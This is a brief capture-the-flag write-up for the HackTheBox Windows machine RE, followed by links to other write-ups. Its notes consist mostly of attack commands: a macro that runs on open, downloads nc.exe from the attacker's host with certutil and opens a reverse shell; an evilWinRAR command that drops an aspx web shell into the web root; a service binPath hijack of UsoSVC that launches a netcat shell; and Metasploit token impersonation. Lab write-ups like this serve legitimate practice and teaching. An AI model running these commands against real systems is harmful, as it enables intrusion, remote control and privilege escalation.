RE @ HackTheBox

01FebFebruary 1, 2020

By xct CTF hackthebox, metasploit, phishing, token, usosvc, windows, winrar

RE is a 40 point windows machine on HackTheBox that involves uploading an ods file with a malicious macro, abusing a winrar vulnerability and using UsoSVC together with metasploit’s incognito module to become root.

Notes

ODS Macro:

Sub Run_at_open
Shell("certutil.exe -urlcache -split -f 'http://<lhost>:8000/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe")
Shell("C:\Windows\System32\spool\drivers\color\nc.exe <lhost> 7000 -ecmd.exe")
End Sub

EvilWinRar:

python3 evilWinRAR.py -e xct_shell.aspx -p 'c:\inetpub\wwwroot\re\' -o xct.rar

UsoSVC:

sc config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe <lhost> 9000 -e cmd.exe"
sc stop usosvc
sc start usosvc

Incognito:

use incognito
list_tokens -u
impersonate_token RE\\coby

Author

xct

22FebFebruary 22, 2020

Zetta @ HackTheBox

Zetta is 40-point machine on hackthebox. We will get the ipv6 address of the box via ftp, use rsync to... read more

22MayMay 22, 2021

Getting Access through the Helpdesk – Delivery @ HackTheBox

We are going to solve Delivery, a 20-point machine on HackTheBox. For user, we will bypass email verification on a... read more

27AugAugust 27, 2022

Resource-Based Constrained Delegation – Resourced @ PG-Practice

Video & additional notes for Resourced, an intermediate difficulty Windows machine on PG-Practice that involves password spraying and an RBCD... read more

13AprApril 13, 2019

LaCasaDePapel @ HackTheBox

LaCasaDePapel is a rather easy machine on hackthebox.eu, featuring the use of php reflection, creating and signing of client certificates... read more

10JunJune 10, 2019